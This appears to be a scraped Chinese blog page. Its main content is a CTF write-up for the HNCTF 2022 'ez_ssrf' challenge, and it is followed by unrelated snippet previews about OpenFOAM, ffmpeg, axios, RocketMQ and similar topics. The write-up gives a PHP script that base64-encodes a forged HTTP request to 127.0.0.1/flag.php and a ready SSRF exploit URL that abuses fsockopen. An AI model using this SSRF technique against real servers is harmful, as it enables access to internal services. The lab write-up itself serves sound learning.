当前位置：首页 > news >正文

[HNCTF 2022 WEEK2]ez_ssrf题目解析

news 2026/2/9 23:29:19

这题主要是引入ssrf这个漏洞攻击，本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后，它将传入的 base64 编码的数据解码，并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思，需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data，host为127.0.0.1，port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

[HNCTF 2022 WEEK2]ez_ssrf题目解析

这题主要是引入ssrf这个漏洞攻击，本质上没有更深入的考察本题是需要我们去伪造一个ssrf的请求头去绕过题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后，它将传入的 bas…...

编程日记 2023/10/16 20:55:08

OpenFOAM: twoPhaseEulerFoam解读

twoPhaseEulerFoam全解读之一(转载) 本系列将对OpenFOAM-2.1.1 中的 twoPhaseEulerFoam 求解器进行完全解读，共分三部分：方程推导，代码解读，补充说明。本篇进行方程推导，详细介绍如果从双流体模型出发得到 twoPhaseEu…...

编程日记 2023/10/16 20:54:07

ffmpeg跨平台arm编译-ubuntu

目录 1. 安装必要的编译器2. 安装必要的依赖项3. 配置编译选项4. 编译安装 1. 安装必要的编译器 32位系统： sudo apt-get update sudo apt-get install gcc-arm-linux-gnueabihf sudo apt-get install g-arm-linux-gnueabihf64位系统： sudo apt-get u…...

编程日记 2023/10/16 20:53:07

Vue 网络处理 - axios 异步请求的使用，请求响应拦截器

目录一、axiox 1.1、axios 简介 1.2、axios 基本使用 1.2.1、下载核心 js 文件. 1.2.2、发送 GET 异步请求 1.2.3、发送 POST 异步请求 1.2.4、发送 GET、POST 请求最佳实践 1.3、请求响应拦截器 1.3.1、拦截器解释 1.3.2、请求拦截器的使用 1.3.3、响应拦截器的使用…...

编程日记 2023/10/16 20:52:06

单目3D目标检测——MonoDLE 模型训练 | 模型推理

本文分享 MonoDLE 的模型训练、模型推理、可视化3D检测结果。模型原理，参考我这篇博客：【论文解读】单目3D目标检测 MonoDLE（CVPR2021）_一颗小树x的博客-CSDN博客源码地址：https://github.com/xinzhuma/monodle 目…...

编程日记 2023/10/16 20:50:05

CSS悬停卡片翻转明信片效果源码附注释

运行效果演示： HTML页面代码： <!DOCTYPE html> <html lang="en" > <head>...

编程日记 2023/10/16 20:49:04

使用kaliber与imu_utils进行IMU、相机+IMU联合标定

目录 1 标定工具编译 1.1 IMU标定工具 imu_utils 1.2 相机标定工具 kaliber 2 标定数据录制 3 开始标定 3.1 IMU标定 3.2 相机标定 3.3 相机IMU联合标定 4 将参数填入ORBSLAM的文件中 1 标定工具编译 1.1 IMU标定工具 imu_utils 标定IMU我们使用imu_utils软件进行标定…...

编程日记 2023/10/16 20:48:02

统一观测丨使用 Prometheus 监控 SQL Server 最佳实践

作者：啃唯 SQL Server 简介 SQL Server 是什么？ Microsoft SQL Server 是 Microsoft 推出的关系型数据库解决方案，支持企业 IT 环境中的各种事务处理、商业智能和分析应用程序。Microsoft SQL Server 是市场领先的数据库技术之一。 SQL S…...

编程日记 2023/10/16 20:47:01

最短无序连续子数组

题目链接最短无序连续子数组题目描述注意点找出符合题意的最短子数组，并输出它的长度-100000 < nums[i] < 100000 解答思路本题的数组可以分为三段，左段中段和右段，如下图所示观察规律可知，左段元素始终比中段…...

编程日记 2023/10/16 20:46:00

更新 | 持续开源迅为RK3568驱动指南第十二篇-GPIO子系统

《iTOP-RK3568开发板驱动开发指南》更新，本次更新内容对应的是驱动（第十二期_GPIO子系统-全新升级）视频，后续资料会不断更新，不断完善，帮助用户快速入门，大大提升研发速度。文档教程更新至第十…...

编程日记 2023/10/16 20:43:57

centos7安装erlang23.3.4.11及rabbitmq3.9.16版本

rpm包有系统版本要求，el是Red Hat Enterprise Linux(EL)的缩写。 EL7是Red Hat 7.x，Centos 7.x EL8是Red Hat 8.x, Centos 8.x 所以我们在安装erlang及rabbitmq时需要选择与自己的服务器相对应的rpm包 # rabbitmq的rpm安装包 https://github.com/rabbi…...

编程日记 2023/10/16 20:41:54

VMware和Debian下载

文章目录 ⭐️写在前面的话⭐️一、VMware二、Debain三、建立虚拟机🚀 先看后赞，养成习惯！🚀🚀 先看后赞，养成习惯！🚀 ⭐️写在前面的话⭐️ CSDN主页：程序员好冰目前在…...

编程日记 2023/10/16 20:40:52

mysql面试题48：MySQL中 Innodb的事务与日志的实现方式

该文章专注于面试，面试只要回答关键点即可，不需要对框架有非常深入的回答，如果你想应付面试，是足够了，抓住关键点面试官： Innodb的事务与日志的实现方式以下是InnoDB事务和日志的实现方式的详细说明：事务日志（Transaction Log）： InnoDB使用事务日志来保证事务的…...

编程日记 2023/10/16 20:39:52

数据结构优先级队列(堆)

数据结构优先级队列(堆) 文章目录数据结构优先级队列(堆)1. 优先级队列1.1 概念 2. 优先级队列的模拟实现2.1 堆的概念2.2 堆的存储方式2.3 堆的创建2.3.1 堆向下调整2.3.2 堆的创建2.3.3 建堆的时间复杂度 2.4 堆的插入与删除2.4.1 堆的插入2.4.2 堆的删除 2.5 用堆模拟实现…...

编程日记 2023/10/16 20:38:50

如何在edge浏览器中给PDF添加文字批注

我用的edge浏览器是目前最新版的（一般自动更新到最新版） 最近，我喜欢用edge浏览器查看PDF，节省电脑资源，快捷且方便。但edge对PDF的标注种类较少，主要是划线和涂色，文字批注功能尚未出现在工具…...

编程日记 2023/10/16 20:37:49

集成学习的小九九

集成学习（Ensemble Learning）是一种机器学习的方法，通过结合多个基本模型的预测结果来进行决策或预测。集成学习的目标是通过组合多个模型的优势，并弥补单个模型的不足，从而提高整体性能。集成学习的主要策略在集成…...

编程日记 2023/10/16 20:36:49

Scrapy是什么 An open source and collaborative framework for extracting the data you need from websites. In a fast, simple, yet extensible way. Scrapy是适用于Python的一个快速、简单、功能强大的web爬虫框架，通常用于抓取web站点并从页面中提取结构化的数…...

编程日记 2023/10/16 20:34:46

想做WMS仓库管理系统，找了好久才找到云表

公司内部仓库管理原方式均基于人工电子表格管理方式来实现收发存管理，没有流程化管理，无法保证数据的准确性和及时性，同时现场操作和数据核对会出现不同步的情况，无法提高仓库的运作效率，因此，我们基于云表…...

编程日记 2023/10/16 20:33:45

公司销售个人号如何管理？

微信管理系统可以帮助企业解决哪些问题呢？ 一、解决聊天记录监管问题 1.聊天记录的保存，让公司的管理者可以随时查看公司任意销售与客户的聊天记录，不用一个一个员工逐一去看，方便管理； 2.敏感词监控，管理者…...

编程日记 2023/10/16 20:30:43

COLE HERSEE 48408 工业4.0、制造业X和元宇宙

COLE HERSEE 48408 工业4.0、制造业X和元宇宙需要数据来释放工业4.0的全部潜力——价值链中的所有公司都可以访问大量数据。一个新的互联数据生态系统旨在提供解决方案:制造业x。在德国联邦经济事务和气候行动部以及BDI、VDMA和ZVEI贸易协会的密切合作下，实施制…...

编程日记 2023/10/16 20:29:42

基于算法竞赛的c++编程（28）结构体的进阶应用

结构体的嵌套与复杂数据组织在C中，结构体可以嵌套使用，形成更复杂的数据结构。例如，可以通过嵌套结构体描述多层级数据关系： struct Address {string city;string street;int zipCode; };struct Employee {string name;int id;…...

编程新知 2025/11/16 19:06:23

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2026/2/8 21:59:25

linux arm系统烧录

1、打开瑞芯微程序 2、按住linux arm 的 recover按键插入电源 3、当瑞芯微检测到有设备 4、松开recover按键 5、选择升级固件 6、点击固件选择本地刷机的linux arm 镜像 7、点击升级 （忘了有没有这步了估计有） 刷机程序和镜像就不提供了。要刷的时…...

编程新知 2026/2/6 20:07:35

Keil 中设置 STM32 Flash 和 RAM 地址详解

文章目录 Keil 中设置 STM32 Flash 和 RAM 地址详解一、Flash 和 RAM 配置界面（Target 选项卡）1. IROM1（用于配置 Flash）2. IRAM1（用于配置 RAM）二、链接器设置界面（Linker 选项卡）1. 勾选“Use Memory Layout from Target Dialog”2. 查看链接器参数（如果没有勾选上面…...

编程新知 2026/2/7 0:28:16

AspectJ 在 Android 中的完整使用指南

一、环境配置（Gradle 7.0 适配） 1. 项目级 build.gradle // 注意：沪江插件已停更，推荐官方兼容方案 buildscript {dependencies {classpath org.aspectj:aspectjtools:1.9.9.1 // AspectJ 工具} } 2. 模块级 build.gradle plu…...

编程新知 2025/7/7 22:33:57